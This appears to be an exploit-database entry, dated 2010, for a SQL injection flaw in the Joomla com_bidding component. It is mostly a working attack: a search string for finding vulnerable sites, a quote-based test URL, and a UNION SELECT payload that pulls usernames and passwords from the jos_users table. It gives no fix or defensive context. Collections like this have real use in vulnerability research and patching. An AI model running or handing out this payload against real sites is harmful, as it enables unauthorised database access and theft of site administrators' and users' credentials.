Joomla! Component com_bidding - SQL Injection

Author: N2n-Hacker
type: webapps
platform: php
port: 
date_added: 2010-03-14  
date_updated:   
verified: 1  
codes:   
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 11766.txt  

#########################################################################
#########################################################################

                [ Joomla com_bidding Sql Injection Vulnerability ]

                          N2n-Hacker ----- 2nd@live.fr<mailto:2nd@live.fr>


#########################################################################
#########################################################################


# Searching = "option=com_bidding"


==> http://www.site.com/index.php?option=com_bidding&id=200' <=[SQLi]--

# error =
"Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result"


==> Exploiting = http://www.site.com/index.php?option=com_bidding&id=-200 UNION ALL SELECT 1,2,
concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from jos_users--



            \\\\\\\\\\\\\\\\\\ Activer khfif drif //////////////////

#########################################################################
                    My Bad Life But Not For4ver nchallah
#########################################################################